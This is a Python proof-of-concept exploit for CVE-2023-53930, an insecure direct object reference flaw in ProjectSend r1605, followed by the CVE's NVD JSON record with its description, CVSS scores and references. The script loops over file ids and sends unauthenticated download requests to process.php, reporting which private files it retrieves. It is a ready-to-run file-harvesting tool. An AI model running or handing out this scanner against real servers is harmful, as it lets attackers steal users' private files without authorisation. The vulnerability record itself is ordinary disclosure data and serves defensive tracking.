CVE-2023-53930

import requests import sys # CVE-2023-53930 PoC - ProjectSend IDOR File Download # Target: ProjectSend r1605 # Vulnerability: Insecure Direct Object Reference in process.php def exploit(target_url, file_id): """ Exploit IDOR vulnerability to download arbitrary files by manipulating the 'id' parameter in download request """ # Construct download URL download_url = f"{target_url}/process.php" # Prepare request parameters params = { 'act': 'download', 'id': file_id } try: # Send request without authentication response = requests.get(download_url, params=params, timeout=10) # Check if file download was successful if response.status_code == 200: content_type = response.headers.get('Content-Type', '') content_disposition = response.headers.get('Content-Disposition', '') # If response contains file content if 'application' in content_type or 'attachment' in content_disposition: print(f"[!] File ID {file_id} - Download successful!") print(f"[+] Content-Type: {content_type}") print(f"[+] Content-Disposition: {content_disposition}") print(f"[+] Content-Length: {len(response.content)} bytes") return True elif len(response.content) > 0: print(f"[!] File ID {file_id} - Possible file content retrieved") print(f"[+] First 200 bytes: {response.content[:200]}") return True else: print(f"[*] File ID {file_id} - Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error accessing File ID {file_id}: {e}") return False def main(): if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [start_id] [end_id]") print(f"Example: python {sys.argv[0]} http://target.com/projectsend 1 100") sys.exit(1) target = sys.argv[1].rstrip('/') start_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1 end_id = int(sys.argv[3]) if len(sys.argv) > 3 else start_id + 50 print(f"[*] Starting IDOR scan on {target}") print(f"[*] Scanning file IDs from {start_id} to {end_id}") for file_id in range(start_id, end_id + 1): exploit(target, file_id) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2023-53930", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:52.500", "lastModified": "2025-12-27T17:15:44.510", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProjectSend r1605 contains an insecure direct object reference vulnerability that allows unauthenticated attackers to download private files by manipulating the download ID parameter. Attackers can access any user's private files by changing the 'id' parameter in the download request to process.php."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectsend:projectsend:r1605:*:*:*:*:*:*:*", "matchCriteriaId": "1ECB1397-1B02-4C9C-90B4-8D1D22CC9BB9"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51400", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.projectsend.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/projectsend-insecure-direct-object-reference-file-download-vulnerability", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51400", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}